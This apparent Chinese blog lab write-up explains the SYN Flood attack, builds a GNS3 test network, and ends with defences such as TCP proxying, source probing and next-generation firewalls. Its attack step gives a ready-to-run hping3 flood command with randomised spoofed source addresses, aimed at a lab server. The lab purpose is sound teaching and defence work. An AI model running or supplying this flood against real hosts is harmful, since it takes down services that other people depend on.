当前位置: 首页 > news >正文

网络协议与攻击模拟_06攻击模拟SYN Flood

一、SYN Flood原理

在TCP三次握手过程中,

  • 客户端发送一个SYN包给服务器
  • 服务端接收到SYN包后,会回复SYN+ACK包给客户端,然后等待客户端回复ACK包。
  • 但此时客户端并不会回复ACK包,所以服务端就只能一直等待直到超时。服务端超时后会重发SYN+ACK包给客户端,默认会重试5次,而且每次等待的时间都会增加。

服务器收到客户端发来的SYN会建立一个半连接状态的Socket,当客户端在一定时间内持续不断的发大量的SYN包但不回复ACK包,就会耗尽服务端的资源,这就是SYN Flood攻击。

二、模拟SYN Flood攻击

1、实验环境

kali、Windows10、GNS3

2、网络拓扑

3、实验配置

  • GNS3路由器
R1#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#int f0/0
R1(config-if)#ip add 192.168.10.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#int f1/0
R1(config-if)#ip add 192.168.100.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#
  • kali虚拟机配置网卡eth0
#打开interfaces文件并添加eth0网卡                                                                            
┌──(root㉿kali)-[/home/kali]
└─# vim /etc/network/interfaces                                                                                                                                                       

  •  启用网卡并查看IP配置是否成功
┌──(root㉿kali)-[/home/kali]
└─# ifdown eth0
ifdown: interface eth0 not configured┌──(root㉿kali)-[/home/kali]
└─# ifup eth0#ifconfig查看上述更改是否生效                                                                            
┌──(root㉿kali)-[/home/kali]
└─# ifconfig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.10.1  netmask 255.255.255.0  broadcast 192.168.10.255inet6 fe80::20c:29ff:fee2:4449  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:e2:44:49  txqueuelen 1000  (Ethernet)RX packets 552  bytes 47915 (46.7 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 51  bytes 7410 (7.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 18558  bytes 1513808 (1.4 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 18558  bytes 1513808 (1.4 MiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0#ping测试看网关是否可达                                                                            
┌──(root㉿kali)-[/home/kali]
└─# ping 192.168.10.254         
PING 192.168.10.254 (192.168.10.254) 56(84) bytes of data.
64 bytes from 192.168.10.254: icmp_seq=1 ttl=255 time=44.6 ms
64 bytes from 192.168.10.254: icmp_seq=2 ttl=255 time=25.1 ms
^C
--- 192.168.10.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 25.077/34.838/44.599/9.761 ms
  • 查看kali路由: 
└─# route -n           
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.10.254  0.0.0.0         UG    0      0        0 eth0
192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
  • Windows使用命令配静态IP
C:\Windows\system32>netsh interface ip set address "Ethernet0" static 192.168.100.1 255.255.255.0 192.168.100.254  
#查看IP是否设置成功                                                                                                                                                                                                                                                                                                                                 C:\Windows\system32>ipconfig  
#ping测试看网关是否可达                                                                                                                                                                                                                                                                                                                                                                                                                         C:\Windows\system32>ping 192.168.100.254                                                                                                                                                                                                         

ping测试 :kali 虚拟机pingWindows server 2016虚拟机

4、搭建IIS服务

  • Windows server 2016上面搭建IIS服务并在本地进行访问

  • kali火狐浏览器访问

肉鸡:几十万台同时在发几十万个包

DDOS计算的是同时的流量

5、实施SYN Flood攻击

  • 工具:kali (hping3 )
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.100.1
#-c 发送 包的数量
#-d 发送包的大小
#-S 只发送SYN的报文
-w 指定Windows窗口大小
#-p 指定目标端口80
#--flood 
#--rand-source发请求的时候指定随机的IP
#服务器的IP

  • 多开几个shell进行 SYN Flood攻击:

  •  抓到的ICMP数据包

三、如何防御SYN Flood

1、使用TCP代理的方式

客户机先和代理服务器建立TCP连接,代理服务器收到TCP的ACK后,再将数据转发给服务器

如果用DDOS服务器将代理服务器打掉了,服务器也不能正常提供服务了,因为服务器是通过代理来提供服务的。代理:选代理一般使用高性能防火墙。

2、TCP的源探测,探测发送方

client发送syn请求,防火墙伪造SYN+ACk报文,如果客户机是虚假的源就不会响应,如果客户机是真实的源,就会发一个重新建立连接请求的RST报文。防火墙收到RST报文得知客户机是真实的,放通将数据传到服务器。

知识补充:下一代防火墙NGFW

不同信任级别的网络之间的一个线速(wire-speed)实时防护设备,能够对流量执行深度检测,并阻断攻击。

  • 前向兼容传统防火墙的功能,包括包过滤、协议状态过滤、NAT和VPN。
  • 具备应用感知能力,能基于应用实施精细化的安全管控策略和层次化的带宽管理手段。
  • 支持IPS功能,实现IPS(入侵防御系统)与防火墙的深度融合。
    IPS系统是位于防火墙和网络的设备之间的设备,当检测到攻击时,IPS会在这种攻击扩散到网络其他地方前阻止这个恶意通信。
    NGFW可以根据IPS检测的恶意流量自动更新下发安全策略,而不需要管理员介入。
  • 利用防火墙以外的信息,增强管控能力
    如利用ITit系统提供的用户信息、位置信息、漏洞和网络资源信息等,帮助改进和优化安全策略。如:通过集成用户认证系统,实现基于用户的安全策略,以应对移动办公场景下IP地址变化带来的管控难题。

相关文章:

  • 2024-01-23(MongoDBElasticSearch)
  • 流动的边框用css怎么实现
  • 国标GB28181协议EasyCVR启动失败报错“Local Machine Check Error”的解决方法
  • Spring/Spring boot项目接入traceId
  • Golang TCP/IP服务器/客户端应用程序,设计一个简单可靠帧传送通信协议。(并且正确处理基于流式控制协议,带来的应用层沾帧[沾包]问题)
  • Linux调试器-gdb使用
  • 免费的WordPress插件大全
  • 生命在于折腾——WeChat机器人的研究和探索
  • c++ 中 什么是转交函数
  • PaddleNLP 如何打包成Windows环境可执行的exe?
  • git bash右键菜单失效解决方法
  • Linux 一键部署influxd2-telegraf
  • vue3模板中使用全局常量和全局方法
  • 小型内衣洗衣机什么牌子好?小型洗衣机全自动
  • 前端JavaScript篇之找出数组中重复的数字、js中数组是如何在内存中存储的?原生遍历数组的方式有哪些?请对以下数组,根据 `born` 的值降序排列
  • 网络传输文件的问题
  • [微信小程序] 使用ES6特性Class后出现编译异常
  • Apache Pulsar 2.1 重磅发布
  • centos安装java运行环境jdk+tomcat
  • CSS选择器——伪元素选择器之处理父元素高度及外边距溢出
  • Django 博客开发教程 16 - 统计文章阅读量
  • ES6简单总结(搭配简单的讲解和小案例)
  • input实现文字超出省略号功能
  • Js实现点击查看全文(类似今日头条、知乎日报效果)
  • Magento 1.x 中文订单打印乱码
  • Netty源码解析1-Buffer
  • node-glob通配符
  • orm2 中文文档 3.1 模型属性
  • Work@Alibaba 阿里巴巴的企业应用构建之路
  • 初识MongoDB分片
  • 翻译:Hystrix - How To Use
  • 分布式任务队列Celery
  • 观察者模式实现非直接耦合
  • 删除表内多余的重复数据
  • 用Python写一份独特的元宵节祝福
  • gunicorn工作原理
  • 交换综合实验一
  • ​总结MySQL 的一些知识点:MySQL 选择数据库​
  • # 20155222 2016-2017-2 《Java程序设计》第5周学习总结
  • #git 撤消对文件的更改
  • (2009.11版)《网络管理员考试 考前冲刺预测卷及考点解析》复习重点
  • (solr系列:一)使用tomcat部署solr服务
  • (博弈 sg入门)kiki's game -- hdu -- 2147
  • (第二周)效能测试
  • (附源码)ssm跨平台教学系统 毕业设计 280843
  • (附源码)计算机毕业设计SSM疫情下的学生出入管理系统
  • (黑马出品_高级篇_01)SpringCloud+RabbitMQ+Docker+Redis+搜索+分布式
  • (教学思路 C#之类三)方法参数类型(ref、out、parmas)
  • (九)信息融合方式简介
  • (入门自用)--C++--抽象类--多态原理--虚表--1020
  • ... 是什么 ?... 有什么用处?
  • .[hudsonL@cock.li].mkp勒索病毒数据怎么处理|数据解密恢复
  • .dwp和.webpart的区别
  • .NET 8.0 中有哪些新的变化?
  • .NET Framework杂记